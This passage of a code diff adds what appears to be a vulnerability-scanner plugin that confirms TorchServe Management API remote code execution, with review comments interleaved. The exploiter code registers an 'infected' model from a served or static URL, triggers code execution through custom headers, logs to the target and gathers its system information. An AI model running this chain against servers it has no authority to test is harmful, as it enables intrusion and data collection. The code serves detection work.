"Success" : "Failure") + + ")\n"); + } + + additionalDetails + .append("System info collected from the target:\n") + .append(prettyPrintJson(this.systemInfo)) + .append("\n\n") + .append("The following log entry was generated on the target:\n\n") + .append(this.messageLogged); + if (this.models != null && !this.models.isEmpty()) { + additionalDetails + .append("\n\nModels found on the target:\n - ") + .append(String.join("\n - ", this.models)); + } + break; + } + + return additionalDetails.toString(); + } + } + + @Inject + public TorchServeExploiter( + TorchServeManagementApiConfig config, + TorchServeManagementApiArgs args, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + TorchServeManagementAPIExploiterWebServer webServer, + TorchServeRandomUtils randomUtils) { + this.httpClient = + checkNotNull(httpClient, "httpClient must not be null") + .modify() + .setFollowRedirects(false) + .build(); + this.payloadGenerator = checkNotNull(payloadGenerator, "payloadGenerator must not be null"); + this.details = + new Details( + checkNotNull(config, "config must not be null"), + checkNotNull(args, "args must not be null")); + this.webServer = checkNotNull(webServer, "webServer must not be null"); + this.randomUtils = checkNotNull(randomUtils, "randomUtils must not be null"); + } + + /** + * Verifies if the target service is vulnerable to TorchServe Management API RCE. + * + * @param service The network service to be checked. + * @return Details of the vulnerability if found, null otherwise. 
+ */ + public @Nullable Details isServiceVulnerable(NetworkService service) { + HttpUrl targetUrl = buildTargetUrl(service); + + try { + return isServiceVulnerable(targetUrl); + } catch (IOException e) { + logger.atWarning().withCause(e).log( + "Failed to check if service is vulnerable due to network error"); + } catch (Exception e) { + logger.atSevere().withCause(e).log( + "Unexpected error occurred while checking service vulnerability"); + } finally { + cleanupExploit(); + } + return null; + } + + private @Nullable Details isServiceVulnerable(HttpUrl targetUrl) throws IOException { + if (!isTorchServe(targetUrl)) return null; + logger.atInfo().log("Target matches TorchServe Management API fingerprint"); + + // Scrape the list of models from the target + String modelName = getModelName(targetUrl); + + String url; + switch (this.details.exploitationMode) { + case BASIC: + logger.atFine().log("BASIC MODE"); + // It looks like TorchServe management API, but we can't exploit it as callback + // functionality has not been enabled + logger.atInfo().log("Callback verification is not enabled, skipping exploit"); + return this.details; + case SSRF: + logger.atFine().log("SSRF MODE"); + // Set the model URL to the Tsunami callback server, consider any callback as a confirmation + executeExploit(targetUrl, getTsunamiCallbackUrl(), modelName); + return checkTsunamiCallbackUrl() ? this.details : null; + case STATIC: + logger.atFine().log("STATIC MODE"); + // Use the provided URL as a model source, confirm code execution directly + url = this.details.staticUrl; + break; + case LOCAL: + logger.atFine().log("LOCAL MODE"); + // Serve the model locally, confirm code execution directly + url = serveExploitFile(modelName); + break; + default: + throw new IllegalArgumentException("Invalid mode: " + this.details.exploitationMode); + } + + // Common verification for STATIC and LOCAL + + executeExploit(targetUrl, url, modelName); + + // 1. Was the model added to the list of models? 
+ // if (!getModelNames(targetUrl).contains(modelName)) return null; + if (!modelExists(targetUrl, modelName)) return null; + + // 2. Can we simulate code execution (hash + callback)? + if (!verifyExploit(targetUrl, modelName)) return null; + + // Report confirmed vulnerability + return this.details; + } + + /** Verifies that the model was added to the list of models on the target. */ + private boolean modelExists(HttpUrl targetUrl, String modelName) throws IOException { + HttpUrl url = targetUrl.newBuilder().addPathSegment("models").addPathSegment(modelName).build(); + JsonElement response = sendHttpRequestGetJson(HttpMethod.GET, url, null); + return response != null; + } + + /** + * Verifies if the exploit was successful on the target server. + * + *

This method simulates code execution through hash calculation and, if enabled, through + * Tsunami's callback server. It also logs and collects system info from the target. + * + * @param targetUrl The URL of the target server. + * @param modelName The name of the model used in the exploit. + * @return True if the exploit is verified successfully, false otherwise. + * @throws IOException If an I/O error occurs during the verification process. + */ + private boolean verifyExploit(HttpUrl targetUrl, String modelName) throws IOException { + boolean verified = false; + + // Simulate code execution through a hash calculation + String randomValue = randomUtils.getRandomValue(); + String hashReceived = interact(targetUrl, modelName, "tsunami-execute", randomValue); + this.details.hashVerification = randomUtils.validateHash(hashReceived, randomValue); + verified = this.details.hashVerification; + + // Simulate code execution through Tsunami's callback server + if (this.payloadGenerator.isCallbackServerEnabled()) { + String callbackUrl = getTsunamiCallbackUrl(); + interact(targetUrl, modelName, "tsunami-callback", callbackUrl); + verified |= checkTsunamiCallbackUrl(); + } + + // One of the verification methods must succeed for the exploit to be confirmed + if (!verified) return false; + + // generate the log file entry on the remote server and collect system info + // generate the log message by adding a timestamp to the template + this.details.messageLogged = String.format(Details.LOG_MESSAGE, Instant.now().toString()); + interact(targetUrl, modelName, "tsunami-log", this.details.messageLogged); + this.details.systemInfo = interact(targetUrl, modelName, "tsunami-info", "True"); + + return true; + } + + private boolean compareHash(String randomValue, String hash) { + try { + MessageDigest md = MessageDigest.getInstance("MD5"); + byte[] digest = md.digest(randomValue.getBytes()); + String expectedHash = String.format("%032x", new java.math.BigInteger(1, digest)); + return 
expectedHash.equals(hash); + } catch (java.security.NoSuchAlgorithmException e) { + return false; + } + } + + /** + * Sends an HTTP request to interact with a specific model on the TorchServe server. + * + *

This method communicates with the TorchServe model via the Management API, utilizing the + * 'customized=true' query parameter to bypass the need for locating the Inference API. It sends a + * request with custom headers and extracts the response from the 'customizedMetadata' field. + * + *

Note: This approach is used to directly interact with the model through Management API, + * avoiding issues with locating the Inference API which may be on a different port or not + * exposed. + * + * @param targetUrl The base URL of the TorchServe Management API. + * @param modelName The name of the model to interact with. + * @param headerName The name of the header to send in the request. + * @param headerValue The value of the header to send in the request. + * @return The response extracted from 'customizedMetadata' field, or null if an error occurs. + * @throws IOException If an I/O error occurs during the HTTP request. + */ + private @Nullable String interact( + HttpUrl targetUrl, String modelName, String headerName, String headerValue) + throws IOException { + // Generally in order to talk to a model we need to use an Inference API (default port: 8080) + // which is separate + // from the Management API (default port: 8081). However, there is a way to hit the model even + // through Management + // API by adding the "customized=true" query parameter to the request, as documented here: + // + // https://pytorch.org/serve/management_api.html#:~:text=customized=true + // + // We're using this trick to send a request to the model in order to avoid the need to locate + // the Inference API + // (which might be remapped to an arbitrary port or not exposed at all). + // With this approach, the actual payload is passed through `tsunami-*` headers and responses + // are placed to the + // "customizedMetadata" field of the response. + // + // Look at model.py for the supported headers and their meaning. 
+ // + // $ curl http://torchserve-081:8081/models/somerandomname?customized=true \ + // -H 'tsunami-header: ' + // [ + // { + // "modelName": "somerandomname", + // "modelVersion": "1.0", + // "modelUrl": "https://s3.amazonaws.com/model.mar", + // "runtime": "python", + // "minWorkers": 1, + // "maxWorkers": 1, + // "batchSize": 1, + // "maxBatchDelay": 100, + // "loadedAtStartup": false, + // "workers": [ + // { + // "id": "9029", + // "startTime": "2023-12-18T22:50:13.994Z", + // "status": "READY", + // "memoryUsage": 227737600, + // "pid": 1719, + // "gpu": false, + // "gpuUsage": "N/A" + // } + // ], + // "customizedMetadata": "" + // } + // ] + HttpHeaders header = HttpHeaders.builder().addHeader(headerName, headerValue).build(); + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addPathSegment(modelName) + .addQueryParameter("customized", "true") + .build(); + + try { + JsonObject response = + sendHttpRequestGetJsonArray(HttpMethod.GET, url, header).get(0).getAsJsonObject(); + String result = response.get("customizedMetadata").getAsString(); + return result; + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Constructs the target URL for a given network service. + * + *

This method builds the root URL for a web application based on the provided network service + * details, typically used as the base URL for further API interactions. + * + * @param service The network service for which the URL is being constructed. + * @return The constructed HttpUrl object for the network service. + */ + private HttpUrl buildTargetUrl(NetworkService service) { + return HttpUrl.parse(NetworkServiceUtils.buildWebApplicationRootUrl(service)); + } + + /** + * Generates a callback URL for Tsunami's payload generator. + * + *

This method configures and generates a payload for Tsunami's callback server, typically used + * in SSRF vulnerability testing. The callback URL is used to verify if an external interaction + * with the Tsunami server occurs, indicating a successful SSRF exploit. + * + * @return The generated callback URL for the Tsunami payload. + */ + private String getTsunamiCallbackUrl() { + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + this.payload = this.payloadGenerator.generate(config); + return this.payload.getPayload(); + } + + private boolean checkTsunamiCallbackUrl() { + this.details.callbackVerification = this.payload != null && this.payload.checkIfExecuted(); + return this.details.callbackVerification; + } + + /** + * Checks whether the specified target URL corresponds to a TorchServe management API. + * + *

This method sends a GET request to the target URL to retrieve the API description. It then + * checks if the response matches the expected signature of a TorchServe management API. + * + * @param targetUrl The URL of the target service to be checked. + * @return True if the target URL is a TorchServe management API, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean isTorchServe(HttpUrl targetUrl) throws IOException { + try { + JsonObject response = + sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "api-description"); + return response != null && isTorchServeResponse(response); + } catch (IOException e) { + logger.atSevere().withCause(e).log("Error checking if target is TorchServe"); + throw e; + } + } + + /** + * Determines if the given response matches the expected signature of a TorchServe API. + * + *

Analyzes the JSON structure of the response to verify if it contains key elements that match + * the TorchServe API's characteristics, such as the API title and the presence of specific + * operation IDs. + * + * @param response The JSON object representing the HTTP response to analyze. + * @return True if the response matches the expected TorchServe signature, false otherwise. + */ + private boolean isTorchServeResponse(JsonObject response) { + // Expected JSON structure + // { + // "openapi": "3.0.1", + // "info": { + // "title": "TorchServe APIs", + // "description": "TorchServe is a flexible and easy to use tool for serving deep learning + // models", + // "version": "0.8.1" + // }, + // "paths": { + // "/models": { + // "post": { + // "description": "Register a new model in TorchServe.", + // "operationId": "registerModel", + String apiTitle = getNestedKey(response, "info", "title"); + String registerModel = getNestedKey(response, "paths", "/models", "post", "operationId"); + + return response.has("openapi") + && apiTitle != null + && apiTitle.equals("TorchServe APIs") + && registerModel != null + && registerModel.equals("registerModel"); + } + + /** + * Retrieves a nested key value from a JSON object. + * + *

This method navigates through a JSON object using a sequence of keys to retrieve the final + * value. It is primarily used for extracting specific data from complex JSON structures. + * + * @param object The JSON object from which to extract the value. + * @param keys A sequence of keys used to navigate to the desired value in the JSON object. + * @return The string value of the nested key, or null if the key does not exist or is not a + * string. + */ + private @Nullable String getNestedKey(JsonObject object, String... keys) { + try { + // Traverse the JSON object until the last key - expect JsonObject at every step + for (int i = 0; i < keys.length - 1; i++) { + object = object.getAsJsonObject(keys[i]); + } + + // Return the value of the last key - expect it to be a String + return object.get(keys[keys.length - 1]).getAsString(); + } catch (NullPointerException | ClassCastException e) { + return null; + } + } + + /** + * Generates a unique model name that does not already exist on the target TorchServe server. + * + *

This method retrieves a list of existing model names from the target server and generates a + * new, random model name that is not in that list. + * + * @param targetUrl The URL of the TorchServe server to check for existing model names. + * @return A unique model name. + * @throws IOException If a network error occurs during the HTTP request. + */ + private String getModelName(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = getModelNames(targetUrl); + this.details.models = models; + + return generateRandomModelName(models); + } + + /** + * Generates a random model name that is not present in the provided list of existing models. + * + *

This method generates a random string and ensures that this string is not already used as a + * model name on the target server. + * + * @param existingModels A list of model names that already exist on the server. + * @return A randomly generated, unique model name. + */ + private String generateRandomModelName(List existingModels) { + String modelName; + do { + modelName = randomUtils.getRandomValue(); + } while (existingModels.contains(modelName)); + return modelName; + } + + /** + * Retrieves a list of model names from the TorchServe server. + * + *

Sends a GET request to the target server's API to fetch the list of currently loaded models. + * Note: Handles pagination to retrieve all models if more than the default page limit. + * + * @param targetUrl The URL of the TorchServe server. + * @return A list of model names present on the server. + * @throws IOException If a network error occurs during the HTTP request. + */ + private List getModelNames(HttpUrl targetUrl) throws IOException { + // get the list of models from the target + List models = new ArrayList<>(); + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + if (response == null) return models; + + // TODO: there's pagination with default limit of 100 models per page + // https://github.com/pytorch/serve/blob/master/docs/management_api.md#list-models + // + // Expected JSON structure: + // "models": [ + // { + // "modelName": "squeezenet1_1", + // "modelUrl": "https://torchserve.pytorch.org/mar_files/squeezenet1_1.mar" + // }, + + try { + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + models.add(model.getAsJsonObject().get("modelName").getAsString()); + } + } catch (NullPointerException | ClassCastException e) { + // No models found, we'll return an empty list + } + return models; + } + + /** + * Removes a model from the TorchServe server by its name. + * + *

This method sends a DELETE request to the server's API to remove a model specified by its + * name. + * + * @param targetUrl The URL of the TorchServe server. + * @param modelName The name of the model to be removed. + * @throws IOException If a network error occurs during the HTTP request. + */ + private void removeModelByName(HttpUrl targetUrl, String modelName) throws IOException { + sendHttpRequestGetJsonObject(HttpMethod.DELETE, targetUrl, "models", modelName); + } + + /** + * Removes a model from the TorchServe server by its URL. + * + *

Retrieves the list of models from the server and searches for a model with the specified + * URL. If found, it uses the model's name to remove it from the server. + * + * @param targetUrl The URL of the TorchServe server. + * @param url The URL of the model to be removed. + */ + private void removeModelByUrl(HttpUrl targetUrl, String url) { + try { + // Get the list of models from the target + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.GET, targetUrl, "models"); + + // Look for the model with the specified URL and remove it + JsonArray modelsArray = response.getAsJsonArray("models"); + for (JsonElement model : modelsArray) { + JsonObject modelObject = model.getAsJsonObject(); + if (modelObject.get("modelUrl").getAsString().equals(url)) { + String modelName = modelObject.get("modelName").getAsString(); + removeModelByName(targetUrl, modelName); + } + } + } catch (NullPointerException | ClassCastException | IOException e) { + // No models, nothing to remove + } + } + + /** + * Starts the web server and serves the exploit file. + * + *

This method initiates the web server bound to a specified host and port, and serves an + * exploit file located at a given URL. It is used in LOCAL exploitation mode to host the exploit + * payload. + * + * @param modelName The name of the model to be used in the exploit file's name. + * @return The URL where the exploit file is served. + * @throws IOException If an error occurs while starting the web server. + */ + private String serveExploitFile(String modelName) throws IOException { + this.webServer.start(this.details.localBindHost, this.details.localBindPort); + HttpUrl baseUrl = + HttpUrl.parse(this.details.localAccessibleUrl) + .newBuilder() + .addPathSegment(modelName + ".mar") + .build(); + return baseUrl.toString(); + } + + /** + * Executes the exploit against the target TorchServe service. + * + *

Constructs and sends an HTTP POST request to add a new model to the TorchServe service. The + * response is analyzed to determine if the model registration was successful, indicating a + * potential exploit. + * + * @param targetUrl The URL of the target TorchServe service. + * @param exploitUrl The URL of the exploit payload. + * @param modelName The name of the model to register. + * @return True if the exploit execution led to successful model registration, false otherwise. + * @throws IOException If a network error occurs during the HTTP request. + */ + private boolean executeExploit(HttpUrl targetUrl, String exploitUrl, String modelName) + throws IOException { + HttpUrl url = + targetUrl + .newBuilder() + .addPathSegment("models") + .addEncodedQueryParameter("url", exploitUrl) + .addQueryParameter("batch_size", "1") + .addQueryParameter("initial_workers", "1") + .addQueryParameter("synchronous", "true") + .addQueryParameter("model_name", modelName) + .build(); + this.details.targetUrl = targetUrl.toString(); + this.details.exploitUrl = exploitUrl; + + // Remove any existing models with the same URL + removeModelByUrl(targetUrl, exploitUrl); + + JsonObject response = sendHttpRequestGetJsonObject(HttpMethod.POST, url); + if (response == null) return false; + + // Expected response (200): + // + // { "status": "Model \"squeezenet1_1\" Version: 1.0 registered with 1 initial workers" } + // + // Expected response (500): + // { + // "code": 500, + // "type": "InternalServerException", + // "message": "Model file already exists squeezenet1_1.mar" + // } + String message = getNestedKey(response, "status"); + if (message == null) return false; + + return message.contains("registered with 1 initial workers"); + } + + /** + * Performs cleanup operations after exploit execution. + * + *

This method removes the added model from the TorchServe service and stops the web server. It + * is essential for reverting changes made during the exploitation process to maintain a clean + * state. + */ + private void cleanupExploit() { + if (this.details.modelName == null || this.details.targetUrl == null) return; + + try { + removeModelByName(HttpUrl.parse(this.details.targetUrl), this.details.modelName); + } catch (IOException e) { + logger.atWarning().withCause(e).log("Failed to cleanup exploit"); + this.details.cleanupFailed = true; + } + + this.webServer.stop(); + } + + /** + * Sends an HTTP request and returns the response as a JsonObject. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonObject, or null if the response is not a valid JSON object. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonObject sendHttpRequestGetJsonObject( + HttpMethod method, HttpUrl baseUrl, String... pathSegments) throws IOException { + return sendHttpRequestGetJson(method, baseUrl, null, pathSegments).getAsJsonObject(); + } + + /** + * Sends an HTTP request and returns the response as a JsonArray. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response as a JsonArray, or null if the response is not a valid JSON array. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonArray sendHttpRequestGetJsonArray( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... 
pathSegments) + throws IOException { + return sendHttpRequestGetJson(method, baseUrl, headers, pathSegments).getAsJsonArray(); + } + + /** + * Sends an HTTP request and returns the response body as a JsonElement. + * + * @param method The HTTP method to use for the request. + * @param baseUrl The base URL for the request. + * @param headers The HTTP headers to include in the request. + * @param pathSegments Additional path segments to append to the base URL. + * @return The response body as a JsonElement, or null if the response body is not valid JSON. + * @throws IOException If a network error occurs during the HTTP request. + */ + private @Nullable JsonElement sendHttpRequestGetJson( + HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String... pathSegments) + throws IOException { + if (headers == null) { + headers = HttpHeaders.builder().build(); + } + + HttpUrl url = baseUrl; + if (pathSegments.length > 0) { + url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build(); + } + + HttpRequest request = + HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build(); + HttpResponse response = this.httpClient.send(request); + + return response + .bodyJson() + .orElseThrow(() -> new IOException("Couldn't parse response body as JSON")); + } + + /** + * Pretty prints a JSON string. + * + *

Formats a given JSON string to a more readable form with proper indentation. If the input + * string is not valid JSON, it returns the original string. + * + * @param json The JSON string to be pretty printed. + * @return The pretty-printed version of the JSON string, or the original string if it's not valid + * JSON. + */ + private String prettyPrintJson(String json) { + try { + Gson gson = new GsonBuilder().setPrettyPrinting().create(); + JsonParser jp = new JsonParser(); + JsonElement je = jp.parse(json); + return gson.toJson(je); + } catch (JsonParseException e) { + return json; + } + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java new file mode 100644 index 000000000..ea0d0e7eb --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java 
@@ -0,0 +1,86 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.common.flogger.GoogleLogger;
+import com.sun.net.httpserver.HttpExchange;
+import com.sun.net.httpserver.HttpServer;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.InetSocketAddress;
+
+public class TorchServeManagementAPIExploiterWebServer {
+ private HttpServer httpServer;
+ private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+ public void start(String hostname, int port) throws IOException {
+ try {
+ httpServer = HttpServer.create(new InetSocketAddress(hostname, port), 0);
+ httpServer.setExecutor(null); // sets the executor to null to use the default executor
+ httpServer.createContext("/", this::handleRequest); // creates a context with a handler
+ httpServer.start();
+ logger.atInfo().log("Web server started on %s:%d", hostname, port);
+ } catch (IOException e) {
+ logger.atSevere().withCause(e).log("IO Exception starting web server");
+ throw e;
+ } catch (Exception e) {
+ logger.atWarning().withCause(e).log("Error starting web server");
+ throw e;
+ }
+ }
+
+ private void handleRequest(HttpExchange exchange) throws IOException {
+ String requestMethod = exchange.getRequestMethod();
+ logger.atInfo().log("Received %s request", requestMethod);
+
+ if ("GET".equals(requestMethod)) {
+ 
serveModelFile(exchange);
+ } else {
+ logger.atWarning().log("Unsupported request method: %s", requestMethod);
+ exchange.sendResponseHeaders(405, -1); // Method Not Allowed
+ }
+ exchange.close();
+ }
+
+ private void serveModelFile(HttpExchange exchange) throws IOException {
+ try (InputStream is = getClass().getClassLoader().getResourceAsStream("model.mar")) {
+ if (is == null) {
+ logger.atSevere().log("Model file not found");
+ exchange.sendResponseHeaders(404, -1); // Not Found
+ return;
+ }
+
+ byte[] zipContent = is.readAllBytes();
+ exchange.getResponseHeaders().add("Content-Type", "application/zip");
+ exchange.sendResponseHeaders(200, zipContent.length);
+
+ try (OutputStream os = exchange.getResponseBody()) {
+ os.write(zipContent);
+ }
+ } catch (IOException e) {
+ logger.atSevere().withCause(e).log("Error serving model file");
+ exchange.sendResponseHeaders(500, -1); // Internal Server Error
+ }
+ }
+
+ public void stop() {
+ if (httpServer != null) {
+ httpServer.stop(0);
+ logger.atInfo().log("Web server stopped");
+ }
+ }
+}
diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java
new file mode 100644
index 000000000..6fb80c3ef
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java
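Review bot: In `serveModelFile` the `catch (IOException e)` wraps the body write as well as the resource read, so a client that drops the connection mid-transfer reaches `exchange.sendResponseHeaders(500, -1)` after the 200 headers were already committed, and that second call throws another IOException out of the handler instead of being logged. Read the resource first, send the 500 only while nothing has gone out, and treat a write failure as log-only, as in the rewrite below. `start()` also assigns `httpServer` without checking for an instance that is already running, so a second `start()` without an intervening `stop()` leaks the first listener; `if (httpServer != null) { stop(); }` at the top of `start()`, or an IllegalStateException, would make that explicit. Because the handler returns `model.mar` for any GET path under `/`, whoever can reach the bind address during the scan receives the code-executing payload; restricting to the expected `<modelName>.mar` path would need the name passed into `start()`, so I only flag it here.
```java
private void serveModelFile(HttpExchange exchange) throws IOException {
  byte[] zipContent;
  try (InputStream is = getClass().getClassLoader().getResourceAsStream("model.mar")) {
    if (is == null) {
      logger.atSevere().log("Model file not found");
      exchange.sendResponseHeaders(404, -1); // Not Found
      return;
    }
    zipContent = is.readAllBytes();
  } catch (IOException e) {
    // Nothing has been sent yet, so a 500 status is still possible here.
    logger.atSevere().withCause(e).log("Error reading model file");
    exchange.sendResponseHeaders(500, -1); // Internal Server Error
    return;
  }
  // From here on the headers are committed; a failed write can only be logged.
  exchange.getResponseHeaders().add("Content-Type", "application/zip");
  exchange.sendResponseHeaders(200, zipContent.length);
  try (OutputStream os = exchange.getResponseBody()) {
    os.write(zipContent);
  } catch (IOException e) {
    logger.atWarning().withCause(e).log("Error writing model file to client");
  }
}
```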
@@ -0,0 +1,62 @@ +/* + * Copyright 2023 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.rce.torchserve; + +import com.beust.jcommander.Parameter; +import com.beust.jcommander.Parameters; +import com.google.tsunami.common.cli.CliOption; + +@Parameters(separators = "=") +public class TorchServeManagementApiArgs implements CliOption { + // Default mode is SSRF, which uses regular Tsunami Callback server to confirm vulnerability. + // Note that it does not observe the code execution on the target directly. + @Parameter( + names = "--torchserve-management-api-mode", + description = + "Exploitation mode used to confirm vulnerability [auto (default), basic, ssrf, static," + + " local]") + public String exploitationMode; + + // Static mode requires an infected model to be hosted on a static URL. + @Parameter( + names = "--torchserve-management-api-model-static-url", + description = "Static URL of the infected model, to be added to TorchServe.") + public String staticUrl; + + // Local mode means the plugin will attempt to serve an infected model directly. Bind host + // and port indicate where plugin will bind the HTTP server to, accessible URL is the URL + // of the server from the outside. 
+ @Parameter( + names = "--torchserve-management-api-local-bind-host", + description = "Path to the infected model, to be added to TorchServe.") + public String localBindHost; + + @Parameter( + names = "--torchserve-management-api-local-bind-port", + description = "Port to bind the local TorchServe instance to.") + public int localBindPort; + + @Parameter( + names = "--torchserve-management-api-local-accessible-url", + description = "URL of the local TorchServe instance accessible from the outside.") + public String localAccessibleUrl; + + @Override + public void validate() { + // Nothing to do here, because we need to merge the config with the CLI args and it cannot be + // done here. + } +} diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java new file mode 100644 index 000000000..de4fbae12 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java 
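Review bot: The help text for `--torchserve-management-api-local-bind-host` reads `Path to the infected model, to be added to TorchServe.`, which is the static-URL wording copied over, and the two flags after it describe a "local TorchServe instance" although, per the comment above them, all three configure the plugin's own HTTP server that serves the infected model in LOCAL mode. Suggested descriptions: `"Host/interface the plugin binds its model-serving HTTP server to (LOCAL mode)."`, `"Port the plugin binds its model-serving HTTP server to (LOCAL mode)."`, `"URL at which the target can reach the plugin's model-serving HTTP server (LOCAL mode)."`. Separately, `localBindPort` is a primitive `int`, so an omitted flag is indistinguishable from an explicit `0`; declaring it `public Integer localBindPort;` lets the merge step detect "not set", consistent with the `String` fields around it. `validate()` defers everything to a merge with the config file that is not part of this diff, so neither behaviour can be confirmed from here.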
@@ -0,0 +1,34 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import com.google.tsunami.common.config.annotations.ConfigProperties;
+
+@ConfigProperties("plugins.doyensec.torchserve")
+public class TorchServeManagementApiConfig {
+ // --torchserve-management-api-mode
+ public String exploitationMode = "auto";
+
+ // --torchserve-management-api-model-static-url
+ public String staticUrl;
+
+ // --torchserve-management-api-local-bind-host
+ public String localBindHost;
+ // --torchserve-management-api-local-bind-port
+ public int localBindPort;
+ // --torchserve-management-api-local-accessible-url
+ public String localAccessibleUrl;
+}
diff --git a/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java
new file mode 100644
index 000000000..ddf59db0e
--- /dev/null
+++ b/doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java
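Review bot: `public int localBindPort;` cannot express "not configured": when the `plugins.doyensec.torchserve` section omits it the field is `0`, which `HttpServer.create(new InetSocketAddress(hostname, port), 0)` in the exploiter web server would happily bind to an ephemeral port that does not match `localAccessibleUrl`. Declaring it `public Integer localBindPort;` makes the absent case detectable, in line with the `String` fields in this class that default to `null`. The merge of this config with the CLI arguments is not in this diff, so whether a `0` is currently rejected there cannot be checked from here. A one-line class comment such as `/** Config-file counterpart of TorchServeManagementApiArgs; presumably overridden by the matching CLI flags — confirm in the merge logic. */` would also help readers find the flag semantics.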
@@ -0,0 +1,174 @@
+/*
+ * Copyright 2023 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.rce.torchserve;
+
+import static com.google.common.base.Preconditions.checkNotNull;
+
+import com.google.common.collect.ImmutableList;
+import com.google.common.flogger.GoogleLogger;
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.ForWebService;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.proto.AdditionalDetail;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.TextData;
+import com.google.tsunami.proto.Vulnerability;
